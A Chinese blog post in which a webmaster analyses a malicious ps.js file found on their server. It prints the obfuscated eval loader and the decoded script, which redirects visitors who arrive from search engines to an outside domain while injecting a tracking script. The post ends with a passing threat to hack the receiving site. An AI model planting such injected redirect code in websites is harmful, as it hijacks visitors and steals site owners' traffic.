搜索引擎流量劫持案例

影 2014年07月29日 安全技术 热度2077　查看评论

        又到月底了 ，惯例检查服务器日志，发现ftp文件有修改记录，但不是我操作的，多年的直觉告诉我，有人给网站传了点东西了。

        打开所在站点根目录，发现个名称为PS的异常文件夹，原来是没有这个文件夹的。如图

        打开，有个ps.js  。脚本？看看是啥……

        打开后是一页乱码。附部分乱码：

OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);

eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+

l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+

l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(57)+l(57)+l(41)+l(59)+l(125));

eval(""+O(9905659)+O(116827996)+O(96036141)+O(112866859)+O(31689884)+O(115834654)+O(112865016)+O(106926851)+O(31683429)+O(60396009)

+O(31683062)+O(99003305)+O(109891600)+O(98014664)+O(115837427)+O(107915205)+O(99993190)+O(108907775)+O(114849022)+O(45546482)+O(1

        不用说，加密了。要先解密。解密代码另附文——《js解密代码一段 》 

        解密后的代码是：

var url = document.referrer;

if(url .indexOf("baidu") >= 0 || url .indexOf("so") >= 0 || url .indexOf("sogou") >= 0  || url .indexOf("google") >= 0 || url .indexOf("youdao") >= 0 || url .indexOf("soso") >= 0 || url .indexOf("bing") >= 0 || url .indexOf("yahoo") >= 0 || url .indexOf("ask") >= 0 || url .indexOf("ebay") >= 0 || url .indexOf("timewarner") >= 0 || url .indexOf("naver") >= 0 || url .indexOf("alibaba") >= 0 || url .indexOf("yandex") >= 0)
{
var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_5845505'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s5.cnzz.com/stat.php%3Fid%3D5845505' type='text/javascript'%3E%3C/script%3E"));

window.location.href="http://jump.myesball.com";

}

        这段代码什么意思呢？

var url = document.referrer;  //获取当前网页超链接的地址url，并把此url的值赋给url


if(url .indexOf("baidu") >= 0 || url .indexOf("so") >= 0 || url .indexOf("sogou") >= 0  || url .indexOf("google") >= 0 || url .indexOf("youdao") >= 0 || url .indexOf("soso") >= 0 || url .indexOf("bing") >= 0 || url .indexOf("yahoo") >= 0 || url .indexOf("ask") >= 0 || url .indexOf("ebay") >= 0 || url .indexOf("timewarner") >= 0 || url .indexOf("naver") >= 0 || url .indexOf("alibaba") >= 0 || url .indexOf("yandex") >= 0)   // 获取"XX"在url中的下标 ，如果url中包含"XX",会得到个int类型的数

{
var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_5845505'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s5.cnzz.com/stat.php%3Fid%3D5845505' type='text/javascript'%3E%3C/script%3E"));

window.location.href="http://jump.myesball.com";

}  //部分escape加密，解密后如下：

{

var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("<span id='cnzz_stat_icon_5845505'></span><script src='" + cnzz_protocol + "s5.cnzz.com/stat.php?id=5845505' type='text/javascript'></script>"));

        由此可见，这是一个劫持流量的js脚本。这个脚本的作用是劫持从baidu、so、sogou、google等搜索引擎点击进入网站的流量，凡是通过搜索结果点击进入网站的流量都会跳转到http://jump.myesball.com 这个网站，而直接访问域名则可以正常访问。这招真黑，表面看不出任何问题，实际上流量已经悄悄溜走了.....

        后续处理工作，不再赘述，也希望大家看完此文有所收获，以后多注意查看自己网站代码,是否多出了一些不正常的js代码。至于偷流量的这个站，等有空日下再上文章。

分享几个根据搜索引擎来路来判断 跳转到指定页面的JS/php代码  http://www.zhangmoulin.com/post/312.html